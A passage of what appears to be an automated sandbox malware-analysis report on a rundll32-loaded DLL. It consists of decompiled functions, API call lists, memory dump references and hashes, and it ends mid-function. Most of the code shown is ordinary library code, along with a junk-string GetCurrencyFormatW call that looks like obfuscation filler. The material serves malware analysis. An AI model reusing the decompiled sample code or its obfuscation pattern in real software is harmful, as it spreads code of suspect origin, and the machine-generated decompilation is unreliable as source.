                                                                                                            • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 100071EB
                                                                                                            • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 10007209
                                                                                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 10007284
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 1000728F
                                                                                                              • Part of subcall function 1000563B: __EH_prolog3.LIBCMT ref: 10005642
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseDeleteEnumH_prolog3H_prolog3_catchOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 301487041-0
                                                                                                            • Opcode ID: 30927a9a5a5225e6a5d87cb90a9f359c3c04349a4499108c5426f94dc879b8ba
                                                                                                            • Instruction ID: 857dbc2a6ce260c152275e15a4f46308dc9617d79fc9f0d391124e600494f057
                                                                                                            • Opcode Fuzzy Hash: 30927a9a5a5225e6a5d87cb90a9f359c3c04349a4499108c5426f94dc879b8ba
                                                                                                            • Instruction Fuzzy Hash: 2A21D075D0425A9FEB25DB64CD41AEEB7B0FF08390F10422AED55AB290DB345E44DBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001BA34 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 82%
                                                                                                            			E1001BA34(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t22;
				int _t32;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t22 =  *0x10048630; // 0x60
					_t12 =  *0x10048634; // 0x60
					goto L6;
				} else {
					_t32 = GetMapMode( *(__ecx + 8));
					if(_t32 >= 7 || _t32 == 1) {
						_t22 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, 0x9ec, _t22);
						_t14 = MulDiv(_t36[1], 0x9ec, _v8);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E1000FE50(__ecx, _a4);
						_push(_t32);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}









                                                                                                            0x1001ba37
                                                                                                            0x1001ba3a
                                                                                                            0x1001ba3f
                                                                                                            0x1001ba8b
                                                                                                            0x1001ba91
                                                                                                            0x00000000
                                                                                                            0x1001ba41
                                                                                                            0x1001ba4a
                                                                                                            0x1001ba4f
                                                                                                            0x1001ba85
                                                                                                            0x1001ba87
                                                                                                            0x1001ba96
                                                                                                            0x1001ba96
                                                                                                            0x1001baa8
                                                                                                            0x1001bab0
                                                                                                            0x1001bab6
                                                                                                            0x1001bab8
                                                                                                            0x1001ba56
                                                                                                            0x1001ba58
                                                                                                            0x1001ba5c
                                                                                                            0x1001ba64
                                                                                                            0x1001ba6b
                                                                                                            0x1001ba6e
                                                                                                            0x1001ba6e
                                                                                                            0x1001ba4f
                                                                                                            0x1001babf

                                                                                                            APIs
                                                                                                            • GetMapMode.GDI32(?,?,?,?,?,?,10015D46,?,00000000,0000001C,100166B4,?,?,?,?,?), ref: 1001BA44
                                                                                                            • GetDeviceCaps.GDI32(?,00000058), ref: 1001BA7E
                                                                                                            • GetDeviceCaps.GDI32(?,0000005A), ref: 1001BA87
                                                                                                              • Part of subcall function 1000FE50: MulDiv.KERNEL32(?,00000000,00000000), ref: 1000FE90
                                                                                                              • Part of subcall function 1000FE50: MulDiv.KERNEL32(?,00000000,00000000), ref: 1000FEAD
                                                                                                            • MulDiv.KERNEL32(?,000009EC,00000060), ref: 1001BAAB
                                                                                                            • MulDiv.KERNEL32(00000000,000009EC,?), ref: 1001BAB6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsDevice$Mode
                                                                                                            • String ID:
                                                                                                            • API String ID: 696222070-0
                                                                                                            • Opcode ID: 5840f87b3609487458aaab7b763707c6ac1ff970de9859fc770cd0648c671529
                                                                                                            • Instruction ID: 22d9993a61e9b7a788ac8545e9176f77a0c9c7fd087465b0058942df5384f877
                                                                                                            • Opcode Fuzzy Hash: 5840f87b3609487458aaab7b763707c6ac1ff970de9859fc770cd0648c671529
                                                                                                            • Instruction Fuzzy Hash: D411E131600A14EFDB22AF55CC85D0EBBE9EF89750B124419FA829B361CB72ED41DF90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001BAC2 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 82%
                                                                                                            			E1001BAC2(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t30;
				int _t33;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t30 =  *0x10048630; // 0x60
					_t12 =  *0x10048634; // 0x60
					goto L6;
				} else {
					_t33 = GetMapMode( *(__ecx + 8));
					if(_t33 >= 7 || _t33 == 1) {
						_t30 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, _t30, 0x9ec);
						_t14 = MulDiv(_t36[1], _v8, 0x9ec);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E1000FDE7(__ecx, _a4);
						_push(_t33);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}









                                                                                                            0x1001bac5
                                                                                                            0x1001bac8
                                                                                                            0x1001bacd
                                                                                                            0x1001bb19
                                                                                                            0x1001bb1f
                                                                                                            0x00000000
                                                                                                            0x1001bacf
                                                                                                            0x1001bad8
                                                                                                            0x1001badd
                                                                                                            0x1001bb13
                                                                                                            0x1001bb15
                                                                                                            0x1001bb24
                                                                                                            0x1001bb24
                                                                                                            0x1001bb36
                                                                                                            0x1001bb3f
                                                                                                            0x1001bb44
                                                                                                            0x1001bb46
                                                                                                            0x1001bae4
                                                                                                            0x1001bae6
                                                                                                            0x1001baea
                                                                                                            0x1001baf2
                                                                                                            0x1001baf9
                                                                                                            0x1001bafc
                                                                                                            0x1001bafc
                                                                                                            0x1001badd
                                                                                                            0x1001bb4d

                                                                                                            APIs
                                                                                                            • GetMapMode.GDI32(?,00000000,?,?,?,?,10015D8A,?,?,?,?,?,?), ref: 1001BAD2
                                                                                                            • GetDeviceCaps.GDI32(?,00000058), ref: 1001BB0C
                                                                                                            • GetDeviceCaps.GDI32(?,0000005A), ref: 1001BB15
                                                                                                              • Part of subcall function 1000FDE7: MulDiv.KERNEL32(?,00000000,00000000), ref: 1000FE27
                                                                                                              • Part of subcall function 1000FDE7: MulDiv.KERNEL32(?,00000000,00000000), ref: 1000FE44
                                                                                                            • MulDiv.KERNEL32(?,00000060,000009EC), ref: 1001BB39
                                                                                                            • MulDiv.KERNEL32(00000000,?,000009EC), ref: 1001BB44
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsDevice$Mode
                                                                                                            • String ID:
                                                                                                            • API String ID: 696222070-0
                                                                                                            • Opcode ID: 52b1341bc56cc0c3782e191dcf6f63c187834ad54c4c27d76bd8348fdb9a1aa1
                                                                                                            • Instruction ID: 64b43f4f01bdcb0d49ba4a6e9a36d092bff00c01b953ac3af172aaf16eee57d7
                                                                                                            • Opcode Fuzzy Hash: 52b1341bc56cc0c3782e191dcf6f63c187834ad54c4c27d76bd8348fdb9a1aa1
                                                                                                            • Instruction Fuzzy Hash: CF11AC35600A14AFEB22AF56CC85C1EBBF9EF89750B124419FA829B761C771ED41CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10011005 Relevance: 7.6, APIs: 5, Instructions: 53stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 94%
                                                                                                            			E10011005(void* __ecx, intOrPtr __edx, struct HWND__* _a4, CHAR* _a8) {
				signed int _v8;
				char _v263;
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t9;
				struct HWND__* _t21;
				void* _t22;
				intOrPtr _t25;
				void* _t26;
				int _t27;
				CHAR* _t28;
				signed int _t29;

				_t25 = __edx;
				_t22 = __ecx;
				_t9 =  *0x10045580; // 0x6a53a566
				_v8 = _t9 ^ _t29;
				_t21 = _a4;
				_t32 = _t21;
				_t28 = _a8;
				if(_t21 == 0) {
					L1:
					E10004E6E(_t21, _t22, _t26, _t28, _t32);
				}
				if(_t28 == 0) {
					goto L1;
				}
				_t27 = lstrlenA(_t28);
				_v264 = 0;
				E10020F40(_t27,  &_v263, 0, 0xff);
				if(_t27 > 0x100 || GetWindowTextA(_t21,  &_v264, 0x100) != _t27 || lstrcmpA( &_v264, _t28) != 0) {
					_t16 = SetWindowTextA(_t21, _t28);
				}
				return E1001FBB5(_t16, _t21, _v8 ^ _t29, _t25, _t27, _t28);
			}


















                                                                                                            0x10011005
                                                                                                            0x10011005
                                                                                                            0x1001100e
                                                                                                            0x10011015
                                                                                                            0x10011019
                                                                                                            0x1001101c
                                                                                                            0x1001101f
                                                                                                            0x10011023
                                                                                                            0x10011025
                                                                                                            0x10011025
                                                                                                            0x10011025
                                                                                                            0x1001102c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001103a
                                                                                                            0x10011045
                                                                                                            0x1001104c
                                                                                                            0x1001105b
                                                                                                            0x10011084
                                                                                                            0x10011084
                                                                                                            0x10011098

                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(?), ref: 1001102F
                                                                                                            • _memset.LIBCMT ref: 1001104C
                                                                                                            • GetWindowTextA.USER32 ref: 10011066
                                                                                                            • lstrcmpA.KERNEL32(00000000,?), ref: 10011078
                                                                                                            • SetWindowTextA.USER32(?,?), ref: 10011084
                                                                                                              • Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
                                                                                                              • Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 4273134663-0
                                                                                                            • Opcode ID: 4c9b521e76057fc99441da0c168c3e684543e59944e4fe8cf20e588bc23182cd
                                                                                                            • Instruction ID: 10167af52a95b6190f72f3b34ec66ed1a7e9255054ff2824fd61587a0385250f
                                                                                                            • Opcode Fuzzy Hash: 4c9b521e76057fc99441da0c168c3e684543e59944e4fe8cf20e588bc23182cd
                                                                                                            • Instruction Fuzzy Hash: 22018476A01268ABE712DB64CCC4BDF77ACEB59780F014065F946DB142EAB1DEC48760
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10008551 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 58%
                                                                                                            			E10008551(void* __edi, intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;

				if(E100083A5() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						_t14 = 0;
						L10:
						return _t14;
					}
					_t23 = _a8;
					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t23 + 4)) = 0;
						 *((intOrPtr*)(_t23 + 8)) = 0;
						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t23 + 0x10) = _t18;
						 *((intOrPtr*)(_t23 + 0x24)) = 1;
						if( *_t23 >= 0x48) {
							E1002291E(_t25, _t23 + 0x28, 0x20, "DISPLAY", 0x1f);
						}
						_t14 = 1;
						goto L10;
					}
				}
				return  *0x100482f0(_a4, _a8);
			}








                                                                                                            0x1000855e
                                                                                                            0x10008577
                                                                                                            0x100085e2
                                                                                                            0x100085e2
                                                                                                            0x100085e4
                                                                                                            0x00000000
                                                                                                            0x100085e5
                                                                                                            0x10008579
                                                                                                            0x10008580
                                                                                                            0x00000000
                                                                                                            0x10008599
                                                                                                            0x1000859a
                                                                                                            0x1000859d
                                                                                                            0x100085ab
                                                                                                            0x100085ae
                                                                                                            0x100085b6
                                                                                                            0x100085b7
                                                                                                            0x100085b8
                                                                                                            0x100085b9
                                                                                                            0x100085c0
                                                                                                            0x100085c3
                                                                                                            0x100085c7
                                                                                                            0x100085d6
                                                                                                            0x100085db
                                                                                                            0x100085de
                                                                                                            0x00000000
                                                                                                            0x100085de
                                                                                                            0x10008580
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 1000858F
                                                                                                            • GetSystemMetrics.USER32 ref: 100085A7
                                                                                                            • GetSystemMetrics.USER32 ref: 100085AE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: System$Metrics$InfoParameters
                                                                                                            • String ID: DISPLAY
                                                                                                            • API String ID: 3136151823-865373369
                                                                                                            • Opcode ID: 3e672ade7eb21542bf4ad099db13503eb2e79d1d00444ef13faf9d4c700962cf
                                                                                                            • Instruction ID: ce2e2f080287dd97aac08b6d54948a152684e982f167b1d142294c492be0e5a9
                                                                                                            • Opcode Fuzzy Hash: 3e672ade7eb21542bf4ad099db13503eb2e79d1d00444ef13faf9d4c700962cf
                                                                                                            • Instruction Fuzzy Hash: 9B119471901624ABEB56DF648C8465B7BA9FF05781F118052FD45AE04AD271DB00CBE0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000BA02 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 90%
                                                                                                            			E1000BA02(void* __ebx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _v4;
				void* __esi;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t17;
				void* _t25;
				void* _t26;
				void* _t28;

				_t28 = __eflags;
				_t24 = __edi;
				_t21 = __ebx;
				E10011382(__ebx, _t25, __ebp, 0xc);
				_push(E1000AEB0);
				_t26 = E10010657(__ebx, 0x10048470, __edi, _t25, _t28);
				_t29 = _t26;
				if(_t26 == 0) {
					E10004E6E(_t21, 0x10048470, __edi, _t26, _t29);
				}
				_t30 =  *(_t26 + 8);
				if( *(_t26 + 8) != 0) {
					L7:
					E100113EF(0xc);
					return  *(_t26 + 8)(_v4, _v0, _a4, _a8);
				} else {
					_push("hhctrl.ocx");
					_t16 = E100094FA(_t21, 0x10048470, _t24, _t26, _t30);
					 *(_t26 + 4) = _t16;
					if(_t16 != 0) {
						_t17 = GetProcAddress(_t16, "HtmlHelpA");
						__eflags = _t17;
						 *(_t26 + 8) = _t17;
						if(_t17 != 0) {
							goto L7;
						}
						FreeLibrary( *(_t26 + 4));
						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
					}
					return 0;
				}
			}











                                                                                                            0x1000ba02
                                                                                                            0x1000ba02
                                                                                                            0x1000ba02
                                                                                                            0x1000ba05
                                                                                                            0x1000ba0a
                                                                                                            0x1000ba19
                                                                                                            0x1000ba1b
                                                                                                            0x1000ba1d
                                                                                                            0x1000ba1f
                                                                                                            0x1000ba1f
                                                                                                            0x1000ba24
                                                                                                            0x1000ba28
                                                                                                            0x1000ba62
                                                                                                            0x1000ba64
                                                                                                            0x00000000
                                                                                                            0x1000ba2a
                                                                                                            0x1000ba2a
                                                                                                            0x1000ba2f
                                                                                                            0x1000ba37
                                                                                                            0x1000ba3a
                                                                                                            0x1000ba46
                                                                                                            0x1000ba4c
                                                                                                            0x1000ba4e
                                                                                                            0x1000ba51
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000ba56
                                                                                                            0x1000ba5c
                                                                                                            0x1000ba5c
                                                                                                            0x00000000
                                                                                                            0x1000ba3c

                                                                                                            APIs
                                                                                                              • Part of subcall function 10011382: EnterCriticalSection.KERNEL32(10048810,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113BE
                                                                                                              • Part of subcall function 10011382: InitializeCriticalSection.KERNEL32(10003840,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113CD
                                                                                                              • Part of subcall function 10011382: LeaveCriticalSection.KERNEL32(10048810,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113DA
                                                                                                              • Part of subcall function 10011382: EnterCriticalSection.KERNEL32(10003840,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113E6
                                                                                                              • Part of subcall function 10010657: __EH_prolog3_catch.LIBCMT ref: 1001065E
                                                                                                              • Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
                                                                                                              • Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F
                                                                                                            • GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 1000BA46
                                                                                                            • FreeLibrary.KERNEL32(?), ref: 1000BA56
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                                            • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                            • API String ID: 2853499158-63838506
                                                                                                            • Opcode ID: e901df98c7b20211684d7a886c9f888567c58a51fe2962439f01aaedd25188f5
                                                                                                            • Instruction ID: fae18e8e3df8c99190cd81beb17d79f1be991ccf9ce49b00c1c0f37f4cd6cf67
                                                                                                            • Opcode Fuzzy Hash: e901df98c7b20211684d7a886c9f888567c58a51fe2962439f01aaedd25188f5
                                                                                                            • Instruction Fuzzy Hash: 97018135204B03AFE322DF60DD05B4F7AD0EF457D1F018818F19AA5565DB30E9409623
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100030AA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100030AA(intOrPtr _a4, intOrPtr _a8) {
				signed int _t7;
				short* _t20;

				_t20 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_t7 = GetCurrencyFormatW(0, 0x11d4, _t20, 0, L"xadqsavcbdfewescGADW", 0x22b9);
				return E10020530( *((intOrPtr*)(_a4 + _t7 *  *0x100440d0 * 8)),  *((intOrPtr*)(_a8 + GetCurrencyFormatW(0, 0x11d4, _t20, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 * 8)));
			}





                                                                                                            0x100030c0
                                                                                                            0x100030ce
                                                                                                            0x1000310d

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100030CE
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100030EE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat
                                                                                                            • String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 3383288267-3161301136
                                                                                                            • Opcode ID: eba1907676d7a635ea872fac9ed42042c5b18c37b6e64dbe33ba4f6f63d73e35
                                                                                                            • Instruction ID: 846c07d914ee6a27032255a918b4843dc12a0f64b55843b4788eb39cb2351f94
                                                                                                            • Opcode Fuzzy Hash: eba1907676d7a635ea872fac9ed42042c5b18c37b6e64dbe33ba4f6f63d73e35
                                                                                                            • Instruction Fuzzy Hash: 7BF0B4312443197FE205D740EC82F927B5DD78A745F010056F700AF0E2CB6338248FA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002BDD1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 65%
                                                                                                            			E1002BDD1() {
				signed long long _v12;
